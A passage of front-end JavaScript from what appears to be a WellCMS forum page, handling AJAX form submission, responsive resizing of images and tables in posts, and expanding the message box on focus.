var uid = 0;
var gid = 0;
xn.options.water_image_url = 'view/img/water-small.png';
</script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script>
var forum_url = 'list-1.html';
var safe_token = '3LgRZtzAzH5SA_2BeFnLh_2B5Ii2GVbg0_2BcwQBSwKTz9bPIXCZt2T0eIx_2FOI2XpIP5j4u56ojza3etg5bYfte6hveQ_3D_3D';
var body = $('body');
body.on('submit', '#form', function() {
var jthis = $(this);
    var jsubmit = jthis.find('#submit');
jthis.reset();
jsubmit.button('loading');
var postdata = jthis.serializeObject();
$.xpost(jthis.attr('action'), postdata, function(code, message) {
if(code == 0) {
location.reload();
} else {
$.alert(message);
jsubmit.button('reset');
}
});
return false;
});


function resize_image() {
var jmessagelist = $('div.message');
var first_width = jmessagelist.width(); 
jmessagelist.each(function() {
var jdiv = $(this);
var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width();
var jmessage_width = Math.min(jdiv.width(), maxwidth);
jdiv.find('img, embed, iframe, video').each(function() {
var jimg = $(this);
var img_width = this.org_width;
var img_height = this.org_height;
if(!img_width) {
var img_width = jimg.attr('width');
var img_height = jimg.attr('height');
this.org_width = img_width;
this.org_height = img_height;
}

if(img_width > jmessage_width) {
if(this.tagName == 'IMG') {
jimg.width(jmessage_width);
jimg.css('height', 'auto');
jimg.css('cursor', 'pointer');
jimg.on('click', function() {

});
} else {
jimg.width(jmessage_width);
var height = (img_height / img_width) * jimg.width();
jimg.height(height);
}
}
});
});
}


function resize_table() {
$('div.message').each(function() {
var jdiv = $(this);
jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); 
});
}

$(function() {
resize_image();
resize_table();
$(window).on('resize', resize_image);
});


var jmessage = $('#message');
jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); });
jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); });

$('#nav li[data-active="fid-1"]').addClass('active');
</script>